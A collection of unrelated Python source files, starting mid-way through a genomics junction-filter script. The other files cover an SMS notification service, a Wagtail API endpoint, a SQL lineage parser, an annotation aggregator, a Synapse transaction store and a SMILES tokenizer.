print 'python typeII_erro_junctions_filter.py -i <typeI erro filtered junctions file> -b <bl8_format file> -e genefile '
sys.exit(3)
for opt, arg in opts:
if opt == '-h':
print 'python typeII_erro_junctions_filter.py -i <typeI erro filtered junctions file> -b <bl8_format file> -e genefile'
sys.exit()
elif opt in ("-i", "--ifile"):
typeI_junfile = arg
elif opt in ("-b", "--bfile"):
bl8_format = arg
elif opt in ("-e", "--efile"):
genefile = arg
prefix=typeI_junfile[:-4]
gap_j=4
bl8_jun_filter(bl8_format, typeI_junfile, genefile, 80,prefix,gap_j)
co_jun_filter(prefix+"_wrong_bl8",typeI_junfile,prefix)
os.system("rm " + prefix + "*exon*")
os.system("rm " + prefix + "*bl8*")
t2=time.time()
print "The time needed in typeII error filter for junctions is:",t2-t1
if __name__ == "__main__":
main(sys.argv[1:])
|
import os
from app.core import config
from app.notifications.utils import Utils
from app.notifications.text_service import TextSerivce
from app.notifications.combox_client import ComboxClient
import logging
class NotificationsFactory(object):
def __init__(self):
self.text_service = TextSerivce()
self.combox_client = ComboxClient()
self.__logger = logging.getLogger(__name__)
# self.base_url = config.SERVER_HOST
def send_verification_code(self, phone_number: str, otp_code: str) -> str or bool:
text = self.text_service.get_text('sms.auth.message').format(otp_code)
result = self.combox_client.send_sms_message(message=text, phone_number=phone_number)
# result can be either OTP or None
if not result:
raise RuntimeError("Failed sending OTP to: {}".format(phone_number))
def __send_whatspp_template(self, phone_number: str, template_name: str, *params) -> str or bool:
self.__logger.info("#__send_whatspp_template# send whatsapp template: {}".format(template_name))
localized_params= self.__format_params(params)
return self.combox_client.send_whatsapp_message(phone_number=phone_number, template_name=template_name,
localized_params=localized_params)
def __format_params(self, *params):
localized_params = []
for param in params:
param_val = {
"default": param
}
localized_params.append(param_val)
self.__logger.info("#__format_params# params: {}".format(localized_params))
return localized_params
def send_whatsapp_welcome_message(self, phone_number: str, name: str) -> str or bool:
message = self.text_service.get_text("whatsapp.welcome.message").format(name)
self.__logger.info("#send_whatsapp_welcome_message# message: {} to {}".format(message,phone_number))
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.welcome.template")
# return self.__send_whatspp_template(phone_number,template_name,name)
# return self.twilio_client.send_sms_message(message,phone_number)
def send_new_assistance_request(self, volunteer_name: object, volunteer_phone: object, distance: object, elder_name: object,
mission_url: object) -> object:
mission_url = self.__shrink_url(mission_url)
message = self.text_service.get_text("whatsapp.new.assistance.message").format(volunteer_name,distance,elder_name,elder_name,mission_url)
self.__logger.info("#send_new_assistance_request# message: {} to {}".format(message, volunteer_phone))
return self.combox_client.send_sms_message(message=message,phone_number=volunteer_phone)
# template_name = self.text_service.get_text("whatsapp.new.assistance.template")
# return self.__send_whatspp_template(volunteer_phone,template_name,volunteer_name,distance,elder_name,elder_name,mission_url)
# # return self.twilio_client.send_sms_message(message,volunteer_phone)
def send_cancel_volunteer_notification(self, volunteer_name: str, phone_number: str) -> str or bool:
message = self.text_service.get_text("whatsapp.cancel.notifications.message").format(volunteer_name)
self.__logger.info("#send_cancel_volunteer_notification# message: {} to {}".format(message, phone_number))
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.cancel.notifications.template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name)
# return self.twilio_client.send_sms_message(message, phone_number)
def send_volunteer_resubscribed(self, volunteer_name: str, phone_number: str) -> str or bool:
message = self.text_service.get_text("whatsapp.resubscribed.message").format(volunteer_name)
self.__logger.info("#send_new_assistance_request# message: {} to {}".format(message, phone_number))
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.resubscribed.template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name)
# return self.twilio_client.send_sms_message(phone_number=phone_number,template_name=template_name,)
def send_first_reminder(self, volunteer_name: str, phone_number: str, elder_name: str, mission_id: str) -> bool or str:
mission_url = self.__shrink_url(self.base_url + mission_id)
message = self.text_service.get_text("whatsapp.first.reminder.message").format(volunteer_name, elder_name,
mission_url)
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.first.reminder..template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name,elder_name,mission_url)
# return self.twilio_client.send_sms_message(message, phone_number)
def send_second_reminder(self, volunteer_name: str, elder_name: str, phone_number: str, mission_id: str) -> bool:
missions_url = self.__shrink_url(self.base_url + mission_id)
message = self.text_service.get_text("whatsapp.second.reminder.message").format(volunteer_name, elder_name,
missions_url)
return self.combox_client.send_sms_message(message=message,phone_number=phone_number)
# template_name = self.text_service.get_text("whatsapp.second.reminder.template")
# return self.__send_whatspp_template(phone_number,template_name,volunteer_name,elder_name,missions_url)
# return self.twilio_client.send_sms_message(message, phone_number)
def __shrink_url(self, link: str) -> str:
shrink = Utils.shrink_url(link)
self.__logger.info("#__shrink_url# shrinked url: {} to: {}".format(link, shrink))
return shrink
|
from wagtail.api.v2.endpoints import BaseAPIEndpoint, PagesAPIEndpoint
from wagtail.api.v2.filters import (FieldsFilter, OrderingFilter, SearchFilter)
from wagtail.api.v2.utils import BadRequestError
from rest_framework.renderers import BrowsableAPIRenderer
from djangorestframework_camel_case.render import CamelCaseJSONRenderer
from .serializers import SimulationExampleSerializer
from .models import SimulationExample
class WebsimPagesAPIEndpoint(PagesAPIEndpoint):
renderer_classes = [CamelCaseJSONRenderer, BrowsableAPIRenderer]
class SimulationExamplesAPIEndpoint(BaseAPIEndpoint):
renderer_classes = [CamelCaseJSONRenderer, BrowsableAPIRenderer]
base_serializer_class = SimulationExampleSerializer
filter_backends = [
FieldsFilter,
OrderingFilter,
SearchFilter
]
known_query_parameters = BaseAPIEndpoint.known_query_parameters.union([
])
body_fields = [
'id',
]
meta_fields = [
]
listing_default_fields = BaseAPIEndpoint.listing_default_fields + [
'id',
'name',
]
nested_default_fields = BaseAPIEndpoint.nested_default_fields + [
'id',
'name',
]
detail_only_fields = [
'code',
'language',
'universe',
]
name = 'simulationexamples'
model = SimulationExample
def get_queryset(self):
models = None
if not models:
models = [SimulationExample]
if len(models) == 1:
queryset = models[0].objects.all()
else:
queryset = SimulationExample.objects.all()
return queryset
def get_object(self):
base = super(SimulationExamplesAPIEndpoint, self).get_object()
return base
def check_query_parameters(self, queryset):
"""
Ensure that only valid query paramters are included in the URL.
"""
query_parameters = set(self.request.GET.keys())
# All query paramters must be either a database field or an operation
allowed_query_parameters = set(self.get_available_fields(queryset.model, db_fields_only=True)).union(self.known_query_parameters)
print str(set(self.get_available_fields(queryset.model, db_fields_only=True)))
unknown_parameters = query_parameters - allowed_query_parameters
if unknown_parameters:
raise BadRequestError("query parameter is not an operation or a recognised field: %s" % ', '.join(sorted(unknown_parameters)))
@classmethod
def _get_serializer_class(cls, router, model, fields_config, show_details=False, nested=False):
# Get all available fields
body_fields = cls.get_body_fields_names(model)
meta_fields = cls.get_meta_fields_names(model)
all_fields = body_fields + meta_fields
from collections import OrderedDict
# Remove any duplicates
all_fields = list(OrderedDict.fromkeys(all_fields))
print 'body_fields ' + str(body_fields)
print 'meta_fields ' + str(meta_fields)
print 'all_fields ' + str(all_fields)
if not show_details:
# Remove detail only fields
for field in cls.detail_only_fields:
try:
all_fields.remove(field)
except KeyError:
pass
# Get list of configured fields
if show_details:
fields = set(cls.get_detail_default_fields(model))
elif nested:
fields = set(cls.get_nested_default_fields(model))
else:
fields = set(cls.get_listing_default_fields(model))
print 'fields_config : ' + str(fields_config)
# If first field is '*' start with all fields
# If first field is '_' start with no fields
if fields_config and fields_config[0][0] == '*':
fields = set(all_fields)
fields_config = fields_config[1:]
elif fields_config and fields_config[0][0] == '_':
fields = set()
fields_config = fields_config[1:]
mentioned_fields = set()
sub_fields = {}
for field_name, negated, field_sub_fields in fields_config:
if negated:
try:
fields.remove(field_name)
except KeyError:
pass
else:
fields.add(field_name)
if field_sub_fields:
sub_fields[field_name] = field_sub_fields
mentioned_fields.add(field_name)
unknown_fields = mentioned_fields - set(all_fields)
if unknown_fields:
raise BadRequestError("unknown fields: %s" % ', '.join(sorted(unknown_fields)))
print 'fields : ' + str(fields)
# Build nested serialisers
child_serializer_classes = {}
from django.core.exceptions import FieldDoesNotExist
for field_name in fields:
try:
django_field = model._meta.get_field(field_name)
except FieldDoesNotExist:
django_field = None
if django_field and django_field.is_relation:
child_sub_fields = sub_fields.get(field_name, [])
from modelcluster.fields import ParentalKey
# Inline (aka "child") models should display all fields by default
if isinstance(getattr(django_field, 'field', None), ParentalKey):
if not child_sub_fields or child_sub_fields[0][0] not in ['*', '_']:
child_sub_fields = list(child_sub_fields)
child_sub_fields.insert(0, ('*', False, None))
# Get a serializer class for the related object
child_model = django_field.related_model
child_endpoint_class = router.get_model_endpoint(child_model)
child_endpoint_class = child_endpoint_class[1] if child_endpoint_class else BaseAPIEndpoint
child_serializer_classes[field_name] = child_endpoint_class._get_serializer_class(router, child_model, child_sub_fields, nested=True)
else:
if field_name in sub_fields:
# Sub fields were given for a non-related field
raise BadRequestError("'%s' does not support nested fields" % field_name)
# Reorder fields so it matches the order of all_fields
fields = [field for field in all_fields if field in fields]
field_serializer_overrides = {field[0]: field[1] for field in cls.get_field_serializer_overrides(model).items() if field[0] in fields}
from wagtail.api.v2.serializers import get_serializer_class
return get_serializer_class(
model,
fields,
meta_fields=meta_fields,
field_serializer_overrides=field_serializer_overrides,
child_serializer_classes=child_serializer_classes,
base=cls.base_serializer_class
)
|
import json
import logging
from typing import Any, Dict, List, Optional, Set, Tuple, Type
from dbcat.catalog import Catalog, CatColumn, CatSource, CatTable
from pglast import Node
from pglast.ast import IntoClause
from pglast.visitors import Ancestor, Continue, Skip, Visitor
from data_lineage import ColumnNotFound, SemanticError, TableNotFound
from data_lineage.parser.binder import (
CatTableEncoder,
ColumnContext,
SelectBinder,
WithContext,
)
from data_lineage.parser.visitor import (
ColumnRefVisitor,
ExprVisitor,
RangeVarVisitor,
TableVisitor,
)
class DmlVisitor(Visitor):
def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor]):
self._name = name
self._insert_table: Optional[Node] = None
self._insert_columns: List[str] = []
self._target_table: Optional[CatTable] = None
self._target_columns: List[CatColumn] = []
self._source_tables: Set[CatTable] = set()
self._source_columns: List[ColumnContext] = []
self._select_tables: List[Node] = []
self._select_columns: List[ExprVisitor] = []
self._with_aliases: Dict[str, Dict[str, Any]] = {}
self._alias_map: Dict[str, WithContext] = {}
self._column_alias_generator = ("_U{}".format(i) for i in range(0, 1000))
self.expr_visitor_clazz = expr_visitor_clazz
@property
def name(self) -> str:
return self._name
@property
def insert_table(self) -> Optional[Node]:
return self._insert_table
@property
def target_table(self) -> CatTable:
return self._target_table
@property
def target_columns(self) -> List[CatColumn]:
return self._target_columns
@property
def source_tables(self) -> Set[CatTable]:
return self._source_tables
@property
def source_columns(self) -> List[ColumnContext]:
return self._source_columns
@property
def select_tables(self) -> List[Node]:
return self._select_tables
@property
def select_columns(self) -> List[ExprVisitor]:
return self._select_columns
def visit_RangeVar(self, ancestors, node):
self._insert_table = node
return Skip
def visit_ResTarget(self, ancestors, node):
self._insert_columns.append(node.name)
return Skip
def visit_CommonTableExpr(self, ancestors, node):
with_alias = node.ctename
table_visitor = TableVisitor(self.expr_visitor_clazz)
table_visitor(node.ctequery)
self._with_aliases[with_alias] = {
"tables": table_visitor.sources,
"columns": table_visitor.columns,
}
return Skip
def visit_CreateTableAsStmt(self, ancestors, node):
"""
Do not process CTAS statement by default.
:param ancestors:
:type ancestors:
:param node:
:type node:
:return:
:rtype:
"""
return Skip
def bind(self, catalog: Catalog, source: CatSource):
self._bind_target(catalog, source)
self._bind_with(catalog, source)
binder = SelectBinder(
catalog,
source,
self._select_tables,
self._select_columns,
self._column_alias_generator,
self.expr_visitor_clazz,
self._alias_map,
)
binder.bind()
if len(binder.tables) == 0:
raise SemanticError("No source tables found")
if len(binder.columns) == 0:
raise SemanticError("No source columns found")
if self.target_table is None:
raise SemanticError("No target table found")
if len(self.target_columns) == 0:
raise SemanticError(
"No target columns found in {}".format(
json.dumps(self.target_table, cls=CatTableEncoder)
)
)
if len(self.target_columns) != len(binder.columns):
raise SemanticError(
"No. of target columns({}) does not match no. of source columns({})".format(
len(self.target_columns), len(binder.columns)
)
)
self._source_tables = binder.tables
self._source_columns = binder.columns
def _bind_target(self, catalog: Catalog, source: CatSource):
target_table_visitor = RangeVarVisitor()
target_table_visitor(self._insert_table)
logging.debug("Searching for: {}".format(target_table_visitor.search_string))
try:
self._target_table = catalog.search_table(
source_like=source.name, **target_table_visitor.search_string
)
except RuntimeError as error:
logging.debug(str(error))
raise TableNotFound(
'"{schema_like}"."{table_like}" is not found'.format(
**target_table_visitor.search_string
)
)
logging.debug("Bound target table: {}".format(self._target_table))
if len(self._insert_columns) == 0:
self._target_columns = catalog.get_columns_for_table(self._target_table)
logging.debug("Bound all columns in {}".format(self._target_table))
else:
bound_cols = catalog.get_columns_for_table(
self._target_table, column_names=self._insert_columns
)
# Handle error case
if len(bound_cols) != len(self._insert_columns):
for column in self._insert_columns:
found = False
for bound in bound_cols:
if column == bound.name:
found = True
break
if not found:
raise ColumnNotFound(
'"{}" not found in the following tables: {}'.format(
column,
json.dumps([self._target_table], cls=CatTableEncoder),
)
)
self._target_columns = bound_cols
logging.debug("Bound {} target columns".format(len(bound_cols)))
def _bind_with(self, catalog: Catalog, source: CatSource):
if self._with_aliases:
# Bind all the WITH expressions
for key in self._with_aliases.keys():
binder = SelectBinder(
catalog,
source,
self._with_aliases[key]["tables"],
self._with_aliases[key]["columns"],
self._column_alias_generator,
self.expr_visitor_clazz,
)
binder.bind()
self._alias_map[key] = WithContext(
catalog=catalog,
alias=key,
tables=binder.tables,
columns=binder.columns,
)
def resolve(
self,
) -> Tuple[
Tuple[Optional[str], str],
List[Tuple[Optional[str], str]],
List[Tuple[Optional[str], str]],
]:
target_table_visitor = RangeVarVisitor()
target_table_visitor(self._insert_table)
bound_tables = []
for table in self._select_tables:
visitor = RangeVarVisitor()
visitor(table)
bound_tables.append(visitor.fqdn)
bound_cols = []
for expr_visitor in self._select_columns:
for column in expr_visitor.columns:
column_ref_visitor = ColumnRefVisitor()
column_ref_visitor(column)
bound_cols.append(column_ref_visitor.name[0])
return target_table_visitor.fqdn, bound_tables, bound_cols
class SelectSourceVisitor(DmlVisitor):
def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor] = ExprVisitor):
super(SelectSourceVisitor, self).__init__(name, expr_visitor_clazz)
def visit_SelectStmt(self, ancestors, node):
table_visitor = TableVisitor(self.expr_visitor_clazz)
table_visitor(node)
self._select_tables = table_visitor.sources
self._select_columns = table_visitor.columns
for key in table_visitor.with_aliases.keys():
self._with_aliases[key] = table_visitor.with_aliases[key]
return Skip
class SelectIntoVisitor(DmlVisitor):
def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor] = ExprVisitor):
super(SelectIntoVisitor, self).__init__(name, expr_visitor_clazz)
def visit_SelectStmt(self, ancestors, node):
super().__call__(node.intoClause)
table_visitor = TableVisitor(self.expr_visitor_clazz)
table_visitor(node.targetList)
table_visitor(node.fromClause)
self._select_tables = table_visitor.sources
self._select_columns = table_visitor.columns
for key in table_visitor.with_aliases.keys():
self._with_aliases[key] = table_visitor.with_aliases[key]
return Skip
class CTASVisitor(SelectSourceVisitor):
def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor] = ExprVisitor):
super(CTASVisitor, self).__init__(name, expr_visitor_clazz)
def visit_CreateTableAsStmt(self, ancestors, node):
return Continue
def visit_String(self, ancestors: Ancestor, node):
# Check if parent is IntoClause
parent = ancestors
in_into_clause = False
while parent is not None and not in_into_clause:
in_into_clause = isinstance(parent.node, IntoClause)
parent = parent.parent
if in_into_clause:
self._insert_columns.append(node.val)
def _bind_target(self, catalog: Catalog, source: CatSource):
target_table_visitor = RangeVarVisitor()
target_table_visitor(self._insert_table)
if target_table_visitor.is_qualified:
schema = catalog.get_schema(
source_name=source.name, schema_name=target_table_visitor.schema_name
)
elif source.default_schema is not None:
schema = source.default_schema.schema
else:
raise SemanticError(
"No default schema set for source {}".format(source.fqdn)
)
self._target_table = catalog.add_table(
table_name=target_table_visitor.name, schema=schema
)
sort_order = 1
for col in self._insert_columns:
self._target_columns.append(
catalog.add_column(
column_name=col,
data_type="varchar",
sort_order=sort_order,
table=self._target_table,
)
)
|
import os
import pandas as pd
def parse_annotations_with_concentration_template(annotations, premise):
"""Parse annotations with the concentration template.
Args:
annotations (pd.DataFrame): Annotations.
premise (str): Premise.
Returns:
annotations_aggregated: List of parsed annotations.
annotations_reported: List of non consensus annotations.
"""
annotations_aggregated = []
annotations_reported = []
rows_grouped_by_premises = annotations[annotations["premise"] == premise]
for i in range(1, 51):
hypothesis = rows_grouped_by_premises.iloc[0][f"hypothesis_{i}"]
if hypothesis != "nan" and hypothesis != "null":
try:
ners = rows_grouped_by_premises[f"correct_ner_{i}"]
except KeyError:
break
n_entail = len(ners[ners == "Entails"])
# contrast to Not Entails/Error in other templates.
n_non_entail = len(ners[ners == "Not Entails"])
if n_entail > 0 or n_non_entail > 0:
# Report to the annotator if annotation results are highly
# non consensus.
if n_entail == n_non_entail:
annotations_reported.append(
[
rows_grouped_by_premises.iloc[0]["id"],
premise,
hypothesis,
]
)
continue
correct_ner = (
"Entails" if n_entail > n_non_entail else "Not Entails"
)
id_ = rows_grouped_by_premises.iloc[0]["id"]
food = rows_grouped_by_premises.iloc[0][f"hypothesis_food_{i}"]
food_id = rows_grouped_by_premises.iloc[0][
f"hypothesis_food_id_{i}"
]
food_part = rows_grouped_by_premises.iloc[0][
f"hypothesis_food_part_{i}"
]
food_part_id = None # Did not includefood part id currently.
chemical = rows_grouped_by_premises.iloc[0][
f"hypothesis_chemical_{i}"
]
chemical_id = rows_grouped_by_premises.iloc[0][
f"hypothesis_chemical_id_{i}"
]
conc_value = rows_grouped_by_premises.iloc[0][
f"hypothesis_conc_value_{i}"
]
conc_value_id = rows_grouped_by_premises.iloc[0][
f"hypothesis_conc_value_id_{i}"
]
conc_unit = rows_grouped_by_premises.iloc[0][
f"hypothesis_conc_unit_{i}"
]
conc_unit_id = rows_grouped_by_premises.iloc[0][
f"hypothesis_conc_unit_id_{i}"
]
annotations_aggregated.append(
[
id_,
premise,
hypothesis.replace("(whole plant)", ""),
correct_ner,
n_entail,
n_non_entail,
food,
food_id,
food_part,
food_part_id,
chemical,
chemical_id,
conc_value,
conc_value_id,
conc_unit,
conc_unit_id,
]
)
return annotations_aggregated, annotations_reported
def parse_annotations_with_food_part_template(annotations, premise):
""" """
annotations_aggregated = []
annotations_reported = []
rows_grouped_by_premises = annotations[annotations["premise"] == premise]
for hypothesis in rows_grouped_by_premises["hypothesis"].unique():
rows_grouped_by_hypotheses = rows_grouped_by_premises[
rows_grouped_by_premises["hypothesis"] == hypothesis
]
ners = rows_grouped_by_hypotheses[f"correct_ner"]
n_entail = len(ners[ners == "Entails"])
n_non_entail = len(ners[ners == "Not Entails/Error"])
# Report to the annotator if annotation results are highly
# non consensus.
if n_entail == n_non_entail:
annotations_reported.append(
[rows_grouped_by_hypotheses.iloc[0]["id"], premise, hypothesis]
)
continue
correct_ner = "Entails" if n_entail > n_non_entail else "Not Entails"
if rows_grouped_by_hypotheses["premise"].values[0][:3] == "<s>":
premise_filtered = rows_grouped_by_hypotheses["premise"].values[0][
3:
]
else:
premise_filtered = rows_grouped_by_hypotheses["premise"].values[0]
id_ = rows_grouped_by_hypotheses.iloc[0]["id"]
food = rows_grouped_by_hypotheses.iloc[0]["hypothesis_food"]
food_id = rows_grouped_by_hypotheses.iloc[0]["hypothesis_food_id"]
food_part = rows_grouped_by_hypotheses.iloc[0]["hypothesis_food_part"]
food_part_id = None
chemical = rows_grouped_by_hypotheses.iloc[0]["hypothesis_chemical"]
chemical_id = rows_grouped_by_hypotheses.iloc[0][
"hypothesis_chemical_id"
]
conc_value = None
conc_value_id = None
conc_unit = None
conc_unit_id = None
annotations_aggregated.append(
[
id_,
premise_filtered,
hypothesis.replace("(whole plant)", ""),
correct_ner,
n_entail,
n_non_entail,
food,
food_id,
food_part,
food_part_id,
chemical,
chemical_id,
conc_value,
conc_value_id,
conc_unit,
conc_unit_id,
]
)
return annotations_aggregated, annotations_reported
def aggregate_annotations_with_different_templates(
path_annotations, save_path=None, save_report=None
):
"""Aggregate annotations with different templates for annotations in the
given folder.
Args:
path_annotations (str): Path to the folder with annotations.
save_path (str or None): If not None, save the output in this path.
Returns:
None
"""
annotations_aggregated = []
annotations_reported = []
for annotation_filename in os.listdir(path_annotations):
annotations = pd.read_csv(f"{path_annotations}/{annotation_filename}")
# Iterate over hypotheses with the same premise to avoid same
# hypotheses generated by different premises.
for premise in annotations["premise"].unique():
# Concentration template is unique, and thus requiring different
# parsing mechanism.
if annotation_filename[-8:-4] == "conc":
(
annotations_aggregated_parsed,
annotations_reported_parsed,
) = parse_annotations_with_concentration_template(
annotations, premise
)
annotations_aggregated.extend(annotations_aggregated_parsed)
annotations_reported.extend(annotations_reported_parsed)
else: # Include food and food parts templates.
(
annotations_aggregated_parsed,
annotations_reported_parsed,
) = parse_annotations_with_food_part_template(
annotations, premise
)
annotations_aggregated.extend(annotations_aggregated_parsed)
annotations_reported.extend(annotations_reported_parsed)
annotations_aggregated = pd.DataFrame(annotations_aggregated)
annotations_aggregated.columns = [
"id",
"premise",
"hypothesis",
"correct_ner",
"n_entail",
"n_non_entail",
"food",
"food_id",
"food_part",
"food_part_id",
"chemical",
"chemical_id",
"conc_value",
"conc_value_id",
"conc_unit",
"conc_unit_id",
]
if save_path is not None:
annotations_aggregated.to_csv(save_path)
if save_report is not None:
annotations_reported = pd.DataFrame(annotations_reported)
annotations_reported.columns = ["id", "premise", "hypothesis"]
annotations_reported.to_csv(save_report)
return annotations_aggregated
if __name__ == "__main__":
path_annotations = (
"C:\\Users\\Fang\\projects\\aifs-food_ke\\data\\annotations_20211204"
)
path_output = "C:\\Users\\Fang\\projects\\aifs-food_ke\\data\\data.csv"
path_report = "C:\\Users\\Fang\\projects\\aifs-food_ke\\data\\reported.csv"
aggregate_annotations_with_different_templates(
path_annotations, path_output, path_report
)
|
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import namedtuple
import six
from canonicaljson import encode_canonical_json
from twisted.internet import defer
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.storage._base import SQLBaseStore, db_to_json
from synapse.storage.database import Database
from synapse.util.caches.expiringcache import ExpiringCache
# py2 sqlite has buffer hardcoded as only binary type, so we must use it,
# despite being deprecated and removed in favor of memoryview
if six.PY2:
db_binary_type = six.moves.builtins.buffer
else:
db_binary_type = memoryview
logger = logging.getLogger(__name__)
_TransactionRow = namedtuple(
"_TransactionRow",
("id", "transaction_id", "destination", "ts", "response_code", "response_json"),
)
_UpdateTransactionRow = namedtuple(
"_TransactionRow", ("response_code", "response_json")
)
SENTINEL = object()
class TransactionStore(SQLBaseStore):
"""A collection of queries for handling PDUs.
"""
def __init__(self, database: Database, db_conn, hs):
super(TransactionStore, self).__init__(database, db_conn, hs)
self._clock.looping_call(self._start_cleanup_transactions, 30 * 60 * 1000)
self._destination_retry_cache = ExpiringCache(
cache_name="get_destination_retry_timings",
clock=self._clock,
expiry_ms=5 * 60 * 1000,
)
def get_received_txn_response(self, transaction_id, origin):
"""For an incoming transaction from a given origin, check if we have
already responded to it. If so, return the response code and response
body (as a dict).
Args:
transaction_id (str)
origin(str)
Returns:
tuple: None if we have not previously responded to
this transaction or a 2-tuple of (int, dict)
"""
return self.db.runInteraction(
"get_received_txn_response",
self._get_received_txn_response,
transaction_id,
origin,
)
def _get_received_txn_response(self, txn, transaction_id, origin):
result = self.db.simple_select_one_txn(
txn,
table="received_transactions",
keyvalues={"transaction_id": transaction_id, "origin": origin},
retcols=(
"transaction_id",
"origin",
"ts",
"response_code",
"response_json",
"has_been_referenced",
),
allow_none=True,
)
if result and result["response_code"]:
return result["response_code"], db_to_json(result["response_json"])
else:
return None
def set_received_txn_response(self, transaction_id, origin, code, response_dict):
"""Persist the response we returened for an incoming transaction, and
should return for subsequent transactions with the same transaction_id
and origin.
Args:
txn
transaction_id (str)
origin (str)
code (int)
response_json (str)
"""
return self.db.simple_insert(
table="received_transactions",
values={
"transaction_id": transaction_id,
"origin": origin,
"response_code": code,
"response_json": db_binary_type(encode_canonical_json(response_dict)),
"ts": self._clock.time_msec(),
},
or_ignore=True,
desc="set_received_txn_response",
)
@defer.inlineCallbacks
def get_destination_retry_timings(self, destination):
"""Gets the current retry timings (if any) for a given destination.
Args:
destination (str)
Returns:
None if not retrying
Otherwise a dict for the retry scheme
"""
result = self._destination_retry_cache.get(destination, SENTINEL)
if result is not SENTINEL:
return result
result = yield self.db.runInteraction(
"get_destination_retry_timings",
self._get_destination_retry_timings,
destination,
)
# We don't hugely care about race conditions between getting and
# invalidating the cache, since we time out fairly quickly anyway.
self._destination_retry_cache[destination] = result
return result
def _get_destination_retry_timings(self, txn, destination):
result = self.db.simple_select_one_txn(
txn,
table="destinations",
keyvalues={"destination": destination},
retcols=("destination", "failure_ts", "retry_last_ts", "retry_interval"),
allow_none=True,
)
if result and result["retry_last_ts"] > 0:
return result
else:
return None
def set_destination_retry_timings(
self, destination, failure_ts, retry_last_ts, retry_interval
):
"""Sets the current retry timings for a given destination.
Both timings should be zero if retrying is no longer occuring.
Args:
destination (str)
failure_ts (int|None) - when the server started failing (ms since epoch)
retry_last_ts (int) - time of last retry attempt in unix epoch ms
retry_interval (int) - how long until next retry in ms
"""
self._destination_retry_cache.pop(destination, None)
return self.db.runInteraction(
"set_destination_retry_timings",
self._set_destination_retry_timings,
destination,
failure_ts,
retry_last_ts,
retry_interval,
)
def _set_destination_retry_timings(
self, txn, destination, failure_ts, retry_last_ts, retry_interval
):
if self.database_engine.can_native_upsert:
# Upsert retry time interval if retry_interval is zero (i.e. we're
# resetting it) or greater than the existing retry interval.
sql = """
INSERT INTO destinations (
destination, failure_ts, retry_last_ts, retry_interval
)
VALUES (?, ?, ?, ?)
ON CONFLICT (destination) DO UPDATE SET
failure_ts = EXCLUDED.failure_ts,
retry_last_ts = EXCLUDED.retry_last_ts,
retry_interval = EXCLUDED.retry_interval
WHERE
EXCLUDED.retry_interval = 0
OR destinations.retry_interval < EXCLUDED.retry_interval
"""
txn.execute(sql, (destination, failure_ts, retry_last_ts, retry_interval))
return
self.database_engine.lock_table(txn, "destinations")
# We need to be careful here as the data may have changed from under us
# due to a worker setting the timings.
prev_row = self.db.simple_select_one_txn(
txn,
table="destinations",
keyvalues={"destination": destination},
retcols=("failure_ts", "retry_last_ts", "retry_interval"),
allow_none=True,
)
if not prev_row:
self.db.simple_insert_txn(
txn,
table="destinations",
values={
"destination": destination,
"failure_ts": failure_ts,
"retry_last_ts": retry_last_ts,
"retry_interval": retry_interval,
},
)
elif retry_interval == 0 or prev_row["retry_interval"] < retry_interval:
self.db.simple_update_one_txn(
txn,
"destinations",
keyvalues={"destination": destination},
updatevalues={
"failure_ts": failure_ts,
"retry_last_ts": retry_last_ts,
"retry_interval": retry_interval,
},
)
def _start_cleanup_transactions(self):
return run_as_background_process(
"cleanup_transactions", self._cleanup_transactions
)
def _cleanup_transactions(self):
now = self._clock.time_msec()
month_ago = now - 30 * 24 * 60 * 60 * 1000
def _cleanup_transactions_txn(txn):
txn.execute("DELETE FROM received_transactions WHERE ts < ?", (month_ago,))
return self.db.runInteraction(
"_cleanup_transactions", _cleanup_transactions_txn
)
|
<reponame>chaoyan1037/Re-balanced-VAE<filename>data/molecule_iterator.py<gh_stars>1-10
import os
import pickle
import re
import torchtext
from torchtext.data import Example, Field, Dataset
from torchtext.data import BucketIterator
pattern = "(\[[^\]]+]|Br?|Cl?|N|O|S|P|F|I|b|c|n|o|s|p|\(|\)|\.|=|#|-|\+|\\\\|\/|:|~|@|\?|>|\*|\$|\%[0-9]{2}|[0-9])"
def smi_tokenizer(smi, regex=re.compile(pattern)):
tokens = [token for token in regex.findall(smi)]
assert smi == ''.join(tokens), 'smi:' + smi + '--tokens:' + ''.join(tokens)
return tokens
class SmileBucketIterator(object):
def __init__(self, data_file, vocab_file, batch_size=256):
self.batch_size = batch_size
smi_field = Field(sequential=True, init_token='<sos>', eos_token=' ',
pad_token=' ', include_lengths=True, batch_first=True, tokenize=smi_tokenizer)
property_field = Field(sequential=False, use_vocab=False)
# load smile data
with open(data_file, 'r') as f:
mol_strs = f.read().strip().split('\n')
mol_strs = [mol.replace(' ', '') for mol in mol_strs]
mol_strs = [smi_field.preprocess(mol) for mol in mol_strs]
smi_examples = []
fields = [('smile', smi_field), ('property', property_field)]
for mol in mol_strs:
ex = Example.fromlist([mol, [1,2,3]], fields)
smi_examples.append(ex)
# load or build vocab
if os.path.isfile(vocab_file):
print('load vocab from:', vocab_file)
smi_field.vocab = pickle.load(open(vocab_file, 'rb'))
else:
print('build and save vocab file:', vocab_file)
smi_field.build_vocab(mol_strs)
pickle.dump(smi_field.vocab, open(vocab_file, 'wb'), protocol=2)
self.vocab = smi_field.vocab
self.vocab_size = len(smi_field.vocab.itos)
self.padding_idx = smi_field.vocab.stoi[smi_field.pad_token]
self.sos_idx = smi_field.vocab.stoi[smi_field.init_token]
